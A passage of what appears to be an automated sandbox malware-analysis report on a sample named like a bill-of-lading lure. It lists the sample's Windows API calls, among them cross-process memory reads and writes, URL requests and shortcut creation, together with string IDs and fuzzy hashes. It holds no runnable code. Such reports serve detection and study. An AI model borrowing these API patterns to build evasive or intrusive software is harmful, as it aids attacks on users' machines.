                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                      • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                      • __freefls@4.LIBCMT ref: 00414135
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 132634196-0
                                                                                                                      • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                      • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                                                      • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                      • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                                                      APIs
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                                        • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                      • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                                      • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                                      • __freeptd.LIBCMT ref: 0041563B
                                                                                                                      • ExitThread.KERNEL32 ref: 00415643
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3798957060-0
                                                                                                                      • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                      • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                      • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                      • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                      • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                      • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1537469427-0
                                                                                                                      • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                      • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                                      • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                      • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _malloc
                                                                                                                      • String ID: Default$|k
                                                                                                                      • API String ID: 1579825452-2254895183
                                                                                                                      • Opcode ID: 3487a4ebd3b6326aef9d7885c20b94cf9b3333ebd549fd878091b2165ba8d13b
                                                                                                                      • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                                      • Opcode Fuzzy Hash: 3487a4ebd3b6326aef9d7885c20b94cf9b3333ebd549fd878091b2165ba8d13b
                                                                                                                      • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID: '$[$h
                                                                                                                      • API String ID: 2931989736-1224472061
                                                                                                                      • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                      • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                                                      • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                      • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strncmp
                                                                                                                      • String ID: >$R$U
                                                                                                                      • API String ID: 909875538-1924298640
                                                                                                                      • Opcode ID: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                                                                                                                      • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                                                      • Opcode Fuzzy Hash: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                                                                                                                      • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                      • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                      • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                      • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                      • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                                      • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                      • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                                      Strings
                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 176396367-557222456
                                                                                                                      • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                      • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                                                      • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                      • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCopyInit_malloc
                                                                                                                      • String ID: 4RH
                                                                                                                      • API String ID: 2981388473-749298218
                                                                                                                      • Opcode ID: 4feaa528d6096a3eb4cb9403f6e39e38e90fdea1ed4b6218c2cb6dc4c25be61b
                                                                                                                      • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                      • Opcode Fuzzy Hash: 4feaa528d6096a3eb4cb9403f6e39e38e90fdea1ed4b6218c2cb6dc4c25be61b
                                                                                                                      • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                      • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                      • String ID: LPT$HH
                                                                                                                      • API String ID: 3035604524-2728063697
                                                                                                                      • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                      • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                                      • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                      • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                        • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 4055202900-2766056989
                                                                                                                      • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                      • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                                                      • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                      • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CrackInternet_memset_wcslen
                                                                                                                      • String ID: |
                                                                                                                      • API String ID: 915713708-2343686810
                                                                                                                      • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                      • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                                                      • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                      • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                      • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                        • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3705125965-3916222277
                                                                                                                      • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                      • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                                                      • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                      • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                      • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                                                      • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                      • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                      • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                      • String ID: AU3_GetPluginDetails
                                                                                                                      • API String ID: 145871493-4132174516
                                                                                                                      • Opcode ID: 86e4c61e32d2ed878dfd7fe720ec64e92d9a8cb9aafa3c38a6749b64446316ec
                                                                                                                      • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                                                      • Opcode Fuzzy Hash: 86e4c61e32d2ed878dfd7fe720ec64e92d9a8cb9aafa3c38a6749b64446316ec
                                                                                                                      • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
